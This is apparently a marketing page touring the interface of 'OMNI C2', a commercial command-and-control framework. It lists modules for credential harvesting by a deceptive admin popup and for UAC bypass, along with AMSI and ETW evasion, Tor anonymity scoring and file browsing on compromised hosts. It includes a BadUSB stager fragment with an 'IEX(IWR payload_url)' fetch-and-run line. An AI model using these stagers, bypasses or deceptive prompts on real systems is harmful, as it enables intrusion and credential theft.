Platform Tour

The OMNI C2
Interface

React 18 web application running on your Kali server. Any browser, any OS. No Java, no thick client, no installs on the operator side.

localhost:3443 React 18 + xterm.js WebSocket agent comms 139 modules Cyberpunk Mode ATT&CK mapped
01Module Explorer — 139 modules, 9 categories

Filter by category and OpSec level. Each module shows privilege requirements, EDR risk level, and a one-line description. Execute instantly from the browser — no command memorisation required.

OMNI C2 — localhost:3443/modules
Dashboard
Sessions
Network
Modules
Loot
ATT&CK
Files
Reports
Agent Gen
AI Assist

Server
Security
🔑 Credentials🌐 Collection🔍 Discovery🌍 Network🛡 Evasion📋 Privilege⚡ Persist⚡ Exec💥 Impact All OpSec ▼ 139 modules
NAMECATEGORYDESCRIPTIONOPSECPRIVILEGE
ad_wmi🔍 DiscoveryComprehensive AD enumeration via WMILowUser
admin-harvester🔑 CredentialsModern UI popup to trick user into granting adminHighAdmin
auto_elevate📋 PrivilegeAutomated UAC bypass using fodhelper methodHighUser
arp🌍 NetworkDisplay ARP table for network device discoverySilentUser
bof⚡ ExecExecute a BOF in-memory (TrustedSec format)LowUser
ca_enum🔍 DiscoveryEnumerate ADCS Certificate Authorities and vulnsLowUser
02BadUSB HID Generator — Arduino sketch in seconds

Generate Arduino sketches for HID-based initial access. PS5 stager or C# stager. Dynamic Gist / TinyURL delivery. English or Hungarian keyboard layout. Compatible with Leonardo, Pro Micro, Teensy.

OMNI C2 — localhost:3443/server/agent-gen
Agent Gen
PowerShell C# (dotnet) ⚡ BadUSB
EncryptionAMSI BypassETW DisableProcess HideGist delivery
// OMNI BadUSB Agent — PS stager #define SPEED_PROFILE 1 // 1=fast 2=medium 3=slow #define LAYOUT_HU 0 // 1=hungarian 0=english #define USE_FIXED_URL 0 // 0=dynamic (curl redirect) // Win+R -> cmd -> IEX(IWR payload_url) #if SPEED_PROFILE == 1 #define D_CHAR 0 #define D_SPECIAL 2 #define D_WINR 300 #define D_CMD 600 #endif
03Security & Anonymity — built-in OpSec scoring

Real-time security check dashboard. Detects TOR SOCKS, VPN interfaces, Kill Switch, and ProxyChains. Aggregates a 0–100 OpSec score with actionable recommendations. Always know your exposure before running a module.

OMNI C2 — localhost:3443/server/security
Server
Status
Security
Config
Log
78
SECURITY SCORE
TOR + VPN ACTIVE
  VPN Interfacetun0 detected  +30
  Tor SOCKSPort 9050  +25
  Kill Switchactive  +25
  ProxyChainsNOT DETECTED  +20
External IP (via TOR)
185.220.xxx.xxx  [copy]
04Remote File Explorer — GUI browser on compromised hosts

Browse the target file system graphically from the OMNI web UI. Navigate drives, download files with one click, create folders, and toggle hidden items — no separate file transfer tool required.

OMNI C2 — localhost:3443/sessions/1/explorer
● LIVE WIN10-CORP

Drives
C: NTFS 17.9 / 475 GB
D: CDROM

Quick Nav
C:\Users
C:\Windows\Temp
C:\ProgramData
Network Shares
Terminal  ..  C:
NAMESIZEMODIFIED
Program Files<DIR>2026-04-24
Program Files (x86)<DIR>2026-04-24
System32<DIR>2026-02-09
Temp<DIR>2026-04-22
Users<DIR>2026-04-24
Windows<DIR>2026-04-24
DumpStack.log12.0 KBDL
17 folders, 3 files   C:\   Ready

Ready to run it yourself?

Start with the Starter plan. 7-day money-back guarantee. Deploy in under 15 minutes.